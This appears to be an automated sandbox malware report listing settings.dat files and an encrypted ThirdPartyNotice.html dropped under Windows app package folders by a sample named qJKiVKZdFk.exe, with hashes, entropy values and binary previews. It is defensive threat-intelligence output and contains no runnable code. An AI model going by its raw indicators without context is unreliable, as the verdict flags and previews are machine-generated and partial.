                                                                                                                                      Preview:regf../..R..,...".3..@...7D./y.C....%...W'j.........K...x8..&9.A..S..C....}....x.a.}..r....x.:C.b.R.A.:~.B.jH....%~..wA90.6....-.<.......4+..{..yv>..'..L..'.Mk+...Z.+.9{P5!=kL.RC.k.4.#.y.7...=KRr..k.|Q8Y.n..W..I/7...6.3..... 0f.;..n.xN..*n..W.....Y.CI]j..E.d.P.7...6Z..Y.";C.]..1/...S.w...e.Z.V..l8.q.^<..#...5..xqm.Q.ZLP1\..by..P..Ty..KG..e.V.K}.."=.T;'...tQ,.x.\...UU...N.........i.,.........C.CC..t..G.K...A`..../?l.u.......L..a.....T.E..r368.R..}MI..r'b.{.7..._R....1."W.Y.QxR..mg('...B.,|.&P.H.E..!zD...%-!.d......RE.7d.*"2J.e..D.e..s...*.W4.e.y.?..~x.a.n".w......cz.....qj.0..A.@../... .0.bL....$...C...j.W@8.M.S*.j$..0R.=m.9p..5B.y.....$..l..q.;SoE.......3 E....a..YS.c..k...g..X.0....n...q/..r.>x.....d.G.+.,.I=r9M.xE..,G.T.69..pA.Hg..).....H..!o.+...f.d......Q..H...#.$TS.+..0._...4@....h..Y*..\| |P .118t.:...n-...../..e.......g...9..9.Ap5%.y...[.8..h74.>p..O..Mg.*..=..;)7.@95.''..........e....9..I.Y.....7.Y..D....rEv....K... A.3Z..U.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978581456032494
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:DNRtHs5DBzOPrjrudMTjAbZeFN5vWC8pvlwf4Z27UqI:pRybzOPredMY2N5uThlwflI
                                                                                                                                      MD5:6AFF0091DECE4B5A3FE809EF09ED8716
                                                                                                                                      SHA1:0D24ABF8276A6EF4F4B05225B77259C6F93095B6
                                                                                                                                      SHA-256:5443D4B6B3C982BAF636BE1BC5145B31306612E1B74D2FAD3D4217544F9C2BAE
                                                                                                                                      SHA-512:950E850A3CB52E7DDBB1AE05AF27E7CA243FD812F746DDB316196E789EA832F2AF399AC233AEE70CA0872BDC8BE59D3E4222DA8E5ABF5669C8DAF8C6AE8C469A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....."....c.\v..h...B.......dj..!.!...7.HC..e.O^&N.*.....l.{.[.....d.r...#..t.PJ...Ox..x...atI..4.....h..pq.g..T..........2i...K.p..lQ=m .c..5./.3.2.....3-.d.L%.qG.G.G.\%....a...>..R..ly9`.$]..ce....Oi.z..0.l.Pr. .9Q.........6./PT~.^o...b,._#m....5....t.?W^,bv....C..|Z..k.V)...3.S.3.....Q._..$...w/....~.9...0DS)...8;.&...eDV...p5g..WI.Yh#.*6j.....FkD..Q........../...TwX.X\CAU.~.....M.1u.4.^..XA....)S.P..(*..p.u>..I...L.yt......I...>....|m.....x..[,wD..uB..%@....@.....).E..)'X..6.9+....q.o..........m.4.i+^....%0.s......(v....8.+.E..rG+..1.o.$S.;.w.v.D....d....8.(0c..A>.w....;O.z.u4S....B.S)^..........T.v^Z.N.].[G..D..`.S...q...%6.&..|.f....'C.w._..!..C..b\..;-....Fg.l~...xJ....2.p..Za%y..p>3.....s...F.P....P.}.......>yn._...&.&]..c....[+n`...GJ&.....T.j.:..9Q.p..5]..._.A..U..3.}.1.H.(0.o..*..\......}`].&.!..{..~...$.e..}.....x..>.........Y.....8..8.l....)t6.q....q1.........|..0.p..[tN....Q.z.../....>....p..t.../.....bf.:..i..'..7x7.......mE..I...

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.ECApp_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979012371540279
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:DBGVmbNTyZR+HwKtcFABLBVAKP5FYqjFXmj6:9ombkZA7mFOgKP7YOcj6
                                                                                                                                      MD5:E209858D7A9EFDC656C9A8C4F8256902
                                                                                                                                      SHA1:53C9DE3E88522D0E48CF332A3CF030032262F486
                                                                                                                                      SHA-256:29611527A9F12BE781A125F496447B133133EA37FF66066812B23C8695F78163
                                                                                                                                      SHA-512:9E1E0ED9F3454B1FB3883DAE14AA66722DBDD6D0BD4769589C534AECAD80C6FEDD8F4E4161E0008C30630D58B606868680567E0C5F7F835F85AC9087EF9BE9F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..c..m.8%....@Z..;..r"O......5:.......P.4A..,.L..9lQ%....r..k..}....\.=...,...i .F.B...=-n..\.....n.5.J.._).&..P.......,..u...#.........../x...E...........:_.p.D35....6..V........KXA.I......+tq...o...aM._JM...e.$VI~..\.O.E*..KP.O.........Dy..AB..>|N....9*.CWNM..F&q..'.R...!YE.onY..>&/w.22...J.BQ.).T.)4.ttC.!..\.-"..E}..VE..'*4..IP@.'.J...Q....yi.<........yj.....)..0.f..B.2=J.F.....p*M.Z.1.6......H.Bu8...:..zF.*...t$...R.|Bk.s>o..\.......,.....o.Y!`.2....U=.3.....<.n.o.@.q....?.Y.6.'$S.QPy.2.........s?a..$t.b...k.h..AIE:.....y......#@b.N.[....j..6c....H..lJ7+..{5o.L..7...I......:...4...<..?.....E..%..s.v..R.'..\....k.ji..../....E.....2G,....].+.p..Gh.`..5..="..M...P....~....J....wS..<....Y..1...<@&.fj.ZU..q....A~..|..g5..U...UE`..g+k......&...u*...T.H.I.~....n.p.k( .2M....."......-m.......#RP.~...=y.6......&.....5.2k"L...z.....<'.....H.g..gR.....r.^TW0...E.^. .Xk..f.....J..>n.{..B.ux.Y..&.~.K.=.....k.'R..?l..PT1A#o>s.{)Fz.cV..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.GetHelp_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.977078073843597
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:D/z3aaYzQNpKhPFMXxKXfjijyB2iC1B3u4uqRQyuCn:DMzuKAXS0y8iCHuYRvn
                                                                                                                                      MD5:78418B10CD7895E4B4A61664E5EDC40F
                                                                                                                                      SHA1:53AE9360C3A2EB951F8150A17C912E157FEA95CE
                                                                                                                                      SHA-256:3D78E6D980187968E4CFD305C3AC6D61786479F8D01C74953B882C618639046C
                                                                                                                                      SHA-512:E361A4BA1A87171692F58628CA55B3DAF50EAFF4A74FE44952AAD8123EC0562F4B9D974E81B3523093CEA016B4EA581402389EB650B1CA65FB854DB8087375C5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.t.../.sT....T.XD....c....j..e4....Hr..d......b....6.Y..^4.xK.}.I....Me=[.M.?..E!..S...0...o.W?O.,E@e....t>8X.'.......!R..@.-S..,n@W..G...a..TRW..L^....M`;.!....58.$" ..")i...p.....z...g.A....u.8.p......}N. .B......cb.].g.. .P..~...U..O..Z...1\.Od..n9.u.U.l...8Y.g.5..-#...)...e..3p.i2w....,..^.Wpe9..X.J0Cv..*.Y..f....=..>.8....x".u (..XT....?%....i.tE..O..&y..?W%..2iy....;.Hl.;.....%.0ar..=3-T[.$-IV..#&/...Y..{...7...%:0..+4Q*sLBT.5....;.......<.vc...(M.....r@g.....2O8H.\...Z......".bz.Eb.)w..f..w..o.....I....Oi/..tO....UG[.t..e&....y/K..*v..Ra.~.....%.o..I.....6...S-...D.mE.l.."*...x...?..6..p..y.p..b.m.g8..M.......6.ym...{..]..A.....H......_.%..1..w5..r.a......./T.....{......l,y._...s.B(O..A.S(;>.......I..r.]..V.{=#...|x*dE{.Z`x............Y...6.N&.|OD[.o..Q.!...........M.....r...k.P....y.....T....k..s.*....(H........h!.o......~.. .1.+!Y#.4..1..#"Z........B6.....~.(.8..;AXmV0/hj..p.\...:........;..6..m..w.;.[..$x.Bn.R9`....Q..pq...l

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980039553179889
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Sv3sBQVvQRY9an9wu5kFoCeA3Us0Qhg83Aq4hNuCiPZ3pF:F6SFP6ZJm83A3uFPZn
                                                                                                                                      MD5:FF4C2369266BB5BFD149A83A6F4E78C8
                                                                                                                                      SHA1:B78C1B4C4E6886306E2D4EB8B00CB3DCCA48EF3E
                                                                                                                                      SHA-256:AC5F5C7A34D28551CFE000891D5FF8EF6E047891CCC0C81A5E6636B58439EBF9
                                                                                                                                      SHA-512:3AB215DB8400622E726BDBDC9BC6BFF09450B50EAF2E766F8C151D4DBD016DDBBB84ECF10DB53D55F42A437238E6DCDF864549C19F7D8952E61802E8FC79B078
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.'....,..+-.;...x=..a....w\ns..Z.p...b.K...%..r..'.....y..J.FBj.>s......~l.lP........-h.."..z..<V....H......5~.....9..@...4&W8w.U..V..$OIe.n.O...X.3fj.EX7.=....mW...k*.N...b...M|...ED..lH...+..n.*...)s.f.....M.)...9.....<.R.<.'`&X.4..C.p>.#..z.s.@.]t.SR...s4....p....TvF.M.....&.L<...U..._tpe....X./.{.*....^RH..3.^,.7....4..tlC..hY..[.7..\..6.+(BU.,..c.u....L..K.`....s....d..Dc..........^%Y.........i.v.8.......z....Ue...>.J.. h\.'%...6I...].....dY1...l.K?%..O......w......D.@...<.....5...+....J.............~...k.G.s..@.d..1..U.Y......3......&......M.|..gJ.PL;X...<;. ....y.3zt/Gi..k.Z|.R...E.S7..LM....m)]..WW..N..`m.....x.T3|.._...|..).7....D.L.../.du..e./......;Lhi.YN@..P...O.Rb...+(..1..q~.sk.;R@...YUwu..>.........._..........0.l...$%.1.H.?....f.,....K.......W..3......o..CS..Jy..y).Acq.|..+.^q..;..^....d......\u.4#1D..{.=!.../.....[p.`.........J.N....z....C.E|}~!.TNA>;.......~M..M]..D.Lav..3X.;..:......A.qI...h.W<%.I^.....C...N.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975086968780467
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:JZ7EabRlPm01PWlpHz6yRMHvfgbVVKpAgTH:JtEMPm01+lpTR+HXVv
                                                                                                                                      MD5:8473B7B92D50C8868E9E621A3319498D
                                                                                                                                      SHA1:B6AF5AD8E5E30E716888C68D501051F26DA1AD2F
                                                                                                                                      SHA-256:F92E95A935E193B4B76B742F7145F999D3AAB0AD7D64E14D1F8FA411F97FC792
                                                                                                                                      SHA-512:7C952C46B029A10C7D25DE8B90A5949F04054D87DA5203E60D9B60583987F36058A787A01CA2E9E22C91FF8899837A539A7A9DB9849472E2091100D3878A233D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf....=J...."....sp..Q..ERZ......F.V.....K.6..cR..Y5Y....k.T..q.?...>.p...h.5........\.xl..SV.....d.'....Z.(.=.ai.....Y...O.&....e..&.r?...?.`..6~x..^7...+.......A...K......O.g.J. *...H.".9.@u..i<Fh.%.....P P.....2C..=..U...[.>.........-:.SE...d..j.<..{*S..Y]8R<L....G...l.zo...U..$.76.\p.@R..U..tpa...Y.0...6...R.4....C....a..m..Bk.5.:.LN......+..SX_3,...x......2.r..S|..~n?.&......^..*:6..?.....9.'.a.)........a.2.C.|..s....oJ.E..e.u......Q..MV....?.R9>.}....O...t...G.m..k(.^.z...%j....0%g..l.......\...4U...hk..k..0\.H=...P..Xh*.._r.h.B.|.i.}.'....Q.1...6..*l.p.....x..$...?$S...p.LG....I.G.D....wO..C....V.....9 ..Ar...h.....>.?........7.jN...V.`...i...{.s...>]}`Z...A\.....b.../(`! mH\.]....a..Z......|..pQY...bo.lx....3..Z.G........VA..5.D_wu...vH)3.$..=yCX.2O..W ...9.2.w:...<.Ud;H.UN...+b.'.T.....!.S..../.I... ...Mb...poU....g..n5fq..D:G..9o+Ll7.H..@...]...(.......F%o'/.;.U.}.H.i.....+{........q....1....o9..../.,.aZ.s.+S..D....P.r.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.978492784105414
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:+fpjSSvv0w80gKSEzh8LnktHoGLqh2aYAUzhAP:ajZvvb80gcGkIG5aYHc
                                                                                                                                      MD5:5033EE14098BDF5372725AB9AA7ED5BC
                                                                                                                                      SHA1:DC8DE9F9D77D553FE41DE37F3761884018E6013E
                                                                                                                                      SHA-256:F642552994DE71B3DE0098603728D0198F8811DB9187A3F9CDBF5648111D1F5C
                                                                                                                                      SHA-512:0C5DD8D539D889ADF3F1FF8931D7178C8F6E72266C889DBF42457BDB7EA6B46A2B704F082267038B937EB797EA68C877EC8A675D471C60A44C92D29718E0616B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.eE..8!_.o/.W`&S...YD..3..v.u...Z...m..5Mk...w."...*X@e(zF...............7t`lb.E..w....% '\..A....PX....9..b.../...V.2....Q....7f....B{...b...V(~..Q........^[F<.................q;....wr...X....Z..ajLj.e....&..I.vg.a8~...zx.E. ...T...Z.........F.zKXy.>..............{q..7~.?.0$.....b..5........ML..F.H@..l.B....X.Y@hrf.c...v4-c....h........6|"....WC{c.I$...`e..E...n..p0.S.j..f+...T...F.....a..tD.cq..5....Z.a.t....v..[.....y..o:.....:.|...]..vR...H^./,.<.G,.O..4$.dcDs..j..+..w&.^.:&u.8...o.iK4.<.....]..B........:(..XF...P..L.YE....X.U..I...N.>v...~p...G6.@.^.....f)$Y1...t..RH...rK..mh.$....b3...._.*..Q.#W<\{x.9...r.:F.?DN.Th...t....u.........6..%.,..p.li...u?*......$..-i..>.......Q.x.|..4L..w.l.Y$.......>.a[..Syy..NY.L.'......D....M..E..../.$X...s.(:.l...y.....z.g..$..p:..'...SK.t.JHLcX.a.bFO...........o()....LX...W.D.8.F..?CsdE.9..g....&.2.._..l...ne....:..).[O.....,....*.$I.vs......`0.f .r.Fi #..siG.t.G.J.gE..n.w$...*Kj.4..o.ClX..d-.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MSPaint_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.980658459419385
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:OWAed9Ku7j544uw2AoWfKC/nqw1UYP2oOivIkb/5G2o6CJSo9rzwf5w:Zd4xN18KCShoOVC/Q2o6DGrUS
                                                                                                                                      MD5:C556BDFF92AE09851E017BA0A1604F3A
                                                                                                                                      SHA1:870611252C0B54D804E08A50DEA03B284CBE286E
                                                                                                                                      SHA-256:2626FF27D4CAEC57EB7184F3BBA667E707B59AF11522E76CA7FD1065248B7C97
                                                                                                                                      SHA-512:9D7B87E66FD9CCF982B6226D74E09ED9DE5A7B2F7733C603F3216A78F18CDED5AADC918F52EFA92B1A17E4E97798E63492A3027B74608F6FFF4F318BDFF772CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf..\.7Z....N_...$...{.B.ly.....+.<.D......R.n(.\Xz....H*.s.$.y.&AH..w.G...x~.`.....0H..{@....V{..x..L2.OV.0.........7.^o.?..`Q.....8=C....G.v..t....>...D3...y(P}Df1..7>.*.9.[..HJ..K...J..$_....V...4../y4..X.8^..8.m.O....-..if.....`J..x.....Aj.',...5ik... ...U.Wx.9.Y...v.H.V..^....Hr0...~.."..y!dd.o.Xrl...1O.bsr.`.d.....+.).H8..../.%n..,).;...`...K:.....X..U.+.J...s<z!k...`..l.;Wh.....]..lC...nj..cl..b...e....+`.,..{..~....j..k....>.....%]Nd....0Z5....eK. ._..............nWTz.^.~{.{..M-.t...[.#..C;..^..1A..L...;1.....#......!...m..mt..ooJ"........*..-.*.Hz....E.j...../.H.`^.P6...ak#c\."./#`."....d... .....M..........c_..$...B.. . ..........c...7M.@B=...{2.....D^..!.".3.x...yn.}:>...?.d.../.fW..6^.l..c.^.@.9...l.pO....*\).8...>..!w..XU..i...=..%t....1}q*t_O.>.@p~.....i|....1.D#D..#.T.K..|.gZ..L..#"te...g..4&BZA.........7...P.q...'....f[DT..4..?...E.....h.W.m...66C....W..\xab...QM....R[....(c:.uC...+7..Sv2B)...}.dB..M.....lly...ym0.......&.?.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.975959049100401
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:gk6uwiAlw8k8YUsU9ccTq6mwMfQDXBYq8bsffp6f:LJAE8psCTfNMfYu7q8
                                                                                                                                      MD5:CBDB6926EBA53DE1756D7D68E96AB790
                                                                                                                                      SHA1:D32D9CEE1660340B5C3A79264AFE3085A8ABE3A0
                                                                                                                                      SHA-256:B80FFE12A8183506AFB22820B52BCFAFB8B179E10EF835EB90E3C784781E9C5B
                                                                                                                                      SHA-512:8AD9CB9D35FC71F6F66855C4042AB895A3763DC13B13D3DC45CD1F6243137E030D47CE0B8DAB96C3F8FE14B1B1B8A1F703348B63A74EED150657A71D8C3628C0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.;.<L.Q......r..9..\.......ti...(y.3..W._T..Y...p:'..9l....I"C......R.......4...e.4..[.......d...:I.".hw!....a......7....l.m.~...\...d.k...C.t...-.7..2......qGv.........1l.la.........I...9.H,.4v#.X}n.hZ.E..j+... .gy...eku./..K..7..B....M.2H...$F.R.... aL...8..-.%dz...Ul*.tr-a.y.&.k.......w.Sd.@.].B..L.^b.L......\....U....)...S......~._.1.u.p..N..`7,,4...K.Qj @.....[H.L...w....`......u..1?..^1...C.ep..a.S3....t..?.\.a.R.\.t ......1...8:fG..b~. ...9.....M...q.s:.?...5,.f......p.(5%.4. D+<.6..C g.$ 4M(..+......V.........4.2.,.h..f.j^T{.['..%.lEd......?.......2^h5P.gn..n.IRU..n.L.D..7..1.76.&^.D.....Ri...E.4'."....<y....G.q....D..I...x.{..!\....d..".......8.0.`[....4..Z.t.~8..fyJ."..A..`......[.. /.H1...9,..U?..........r...=...V.C.*..mmp.0....{.0..V..&<....E.l.A.l.....Ur.e.e.F.n9..&.k.....Dv.....e........j.}.#.....4.......O..w(>.&g.:...Qk.d.6F......Z.M.5!.a(..=n...Q.....KM?N.......l.Gv......E.......$f.iV..:w.jx....b..s...HD.wI<.,q.@..R..

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.979418657011107
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:lx1bVMSt0uUlmYYkvh8vWSHfVXNC/xQmMVGR1hZ3PfLiH4i4MU:lHbVMSt2fixfVXNqxQmM4RY4NMU
                                                                                                                                      MD5:18C655972CBAF3F8C4749BB4404517AB
                                                                                                                                      SHA1:DDAA2A5885E413AABD15BAEF353CBED063415726
                                                                                                                                      SHA-256:D8F7A8163E913C56AD6A25A65FFB6628675251E368B5CD699E297F3FFC2AF5FD
                                                                                                                                      SHA-512:8D5A202D4DD16B3C1336C6E11BF8260A633DD2185C71863BCAABBF975CC65EF8832C08968DCD42B617821CDAE29E98A34B448A64E111DBB7BA3D31C4E60DB88C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf...&..hU-.5..B....0..9vV..x.'.z>.xWOI.y[J...o..I.9.u.O*...].)....?.M32F...k.j.q.Ww.~.|c....xW.k..C...(. .{....zO.Q.`.G..ZU....^.@..#.'.$...%T+.'sb..t6...I"...K..v._.V..3.....e.2YOKO....g.6.|.,KIH..Ec.:s...k..f...!..L.J..E.y.....u..:|..z....M..?...H..[..p',-.....+.....S7..yp#;^...`=z..=J.N^u..L(....@@e.oe...8.s.~71.{..G.#x,...|L.S......9-K.k...W1q.".F.+...G.]_......A-[.`.Lt^.(7.......E... E<n._G5........k.O2b.e-....i...h.r8.m.N...1..fs.$XMF.c..;...)=...^0_U.95....1..<..Xg\.....Qc.]; .k[.f.2....C..O....L...E..0K."....$../......J...|..(.G.....\......m..+..C:n0a....X"=C........?.s..W]6w.....U...U..(..p..svv59,.h.$....&.(..W.;..X.Y...O..B`......\k.%..3........I...U.KZ........\. F.#.g...._.Z...9.}.D{.....I8.....fsb>.....7n.5...uY.h.P.2._`...3.q.-s+...f..R.......].-Vn.R`..(..kN.X.=...7..d40.7.=..n.Qz.%(...(.v2..o..1l..5.w...1|..z....(.I....Um....{..i..*.7W.+@=..n..#...y..9.].<..hb;.P....Q..G.w#...ydc..X..'...S.y.v..".K....T..U.UO..d.8."../=.OK

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.981504012537229
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:pz+WM1CLxax2CU+ZagqOmMvTC1uHKMUNYr:pz+93BUzMv4k
                                                                                                                                      MD5:A19B061578126015EC18518D98922DFE
                                                                                                                                      SHA1:926F839EAC0605CF646BAEB79ACF5F6CBDFB1A0A
                                                                                                                                      SHA-256:5A197E44FD8628E1DC6D097884AEE10CAC778ABD3CCF11D1B4140D0D81D02B20
                                                                                                                                      SHA-512:A25E95B799D657EFE67698412A7780653FD5E8B776A263E2757ED8C93365A22E4352FEE3371176FD3A8B965BD169E16E9BADA5FF644FBCD0686A91728C919D9F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.....86....4..K.,d.F....X..c.x....83..K....Y...._L3..u1&q...8.v...%....!.8RJu1.:..X....1^...~..`Ji.......6.a..>.JA....k.w..1....7x.x9.1.O.*,./......6.].....zY....y....$'L....`6+.g....)t.fvi..yl>$...2.0.]..d'O...P..Y...^.F.$:.........hA.bo.e.h.......[j..K.....3...A..y.o+.w.a.3.....g.l..V..N...........r.hJ....M....#_p/3..&..rI!....G.........Q.....K26...r.t..(Hu.......j..z..=.P.p0...3.3|...I.r.M._.....I.G.~.......).{E..!r. .g..).......m...F.^.".c..b.k."....]_....>.?."..... ]H.<.}..e...X..."#.QC.|.J..U.O....R5.M..xM...Z...mZ.,.hF..6.&S._..a...:....P..............4W......^..`..I....p....8.....}i...w2.*v..n..........tF#..D.l.v.(f..D..o....Z9T)..y.gS..Q._........<...KO..../.t.\]..#...j..x..^5c.!.....S.aQ .&.t..J.a.....t...Zgh.W..........v....V>...U..,.....J... F.jj.%9.{y.VT.L8.e.i.?|..5.E.H.1.'2`^X..9G3.rl%E.Q..U..vG~.e`.......}........'..q....9.So@ls..+......;'...(..i..Dy......Q..W......:..U.......h#..xm.K..W.u....3...0..?.</.n...c.s..8Vge..I.h*.

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\LocalState\ThirdPartyNotice.html

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):107523
                                                                                                                                      Entropy (8bit):7.998338036159156
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:3072:rRkK0DNVNIfk+Eiu2zwWKRJ3mzHb/8P5t:rRkKKGfkge3lj
                                                                                                                                      MD5:7D886C8173ED64CAA1E19E2CF12AD326
                                                                                                                                      SHA1:1532FBF7C0C1C116300EDB953B92F762974C504D
                                                                                                                                      SHA-256:AD5695B5EA44F6FE4CEEB59F6D2D7ACE9C6342D857A8E8DBCDB8E3787D97D9AB
                                                                                                                                      SHA-512:2DCAAF3C916097BBFECA246F9A3BB64A7CA50625D8D12E0BBA8A464044E364A1A3BE284DDDF23648CB5586AFFDF4CED22586852A660881BF142A838CD8DB2BBB
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:<!doczA:.........Df.<....q.X...0b.E..)..../..^.46.Y....;...~R...s....~.l.F.Q.....R..............j...G..;e.7ka..o=+Y.G.g._.... .q.8P.-.../..Oq.!.V/9......O..f2k.N..k~%.y......h..E....<...Jn...2.q.Y^..u..E.....N.S.D$./..r...zj..9b.........2....j...=.W%..L ..&. ]..aY.....h.8.3......I...]/..-....z...<.._1.t.,^ z.2...#Y$...a...x.f.|.6...x.h..T..J.R6w.E.X)....S..C..~j.D2r..r....t\..*?G\.e...1.}[....aI}.C...u......Px....{m+s..i.....K.n.ql....!.....{S.G..F..;h#...q...*..b...;Ij7..>........?.1ehnB.....`.......h....a.[.n.T|....}.U....Gk.;K..n.....P@...5.......,...4Fa...T..............S....Tc..K....JX..RO#ngE.[.0.Af.p.*NO....W...P..W.>....A..0''N...../..7.........=N..!.,H.r..uB.u,e..A.Q....-..qo$fjt.....oG..ox..o....F.9y.Th.?,..I.d.@.....zn!.......j....?.K...# ..8.......J.g.............I.~..z.&.F..[#H.7..B.bT. ..Vb.....).}R.g6n.(*....W.N..E.2.....(!q,...D....3.z.....f))P.....^4..b|...>Q..."..3..,...".arZ.@-zS..w.....D1s:..Q...1.......K.-.<../

                                                                                                                                      C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):8526
                                                                                                                                      Entropy (8bit):7.976590330670892
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:85pHc++6UgKUjPH/GAUv5qkv6MJAiKtwF/VgzZI2U:qHUQziv5qOAiKu/ydE
                                                                                                                                      MD5:E92156B0ED9FC0039ABA48D57E7BB239
                                                                                                                                      SHA1:57AA65116E96D47900B6DE0168DC8078BEAAF5B5
                                                                                                                                      SHA-256:6F7108B068D69317FD0CC904FF90A5EDA70D104EA67B6139B4D56893F336E237
                                                                                                                                      SHA-512:BBB057CAF8C0BE25DC080D1C0FDF71D522303056B4D761F8A72978E45C997EC7896F87BDC255570BC1A66518B1CD10E8F8F3939F1BC849CAE9A20947F73DDE3E
                                                                                                                                      Malicious:false
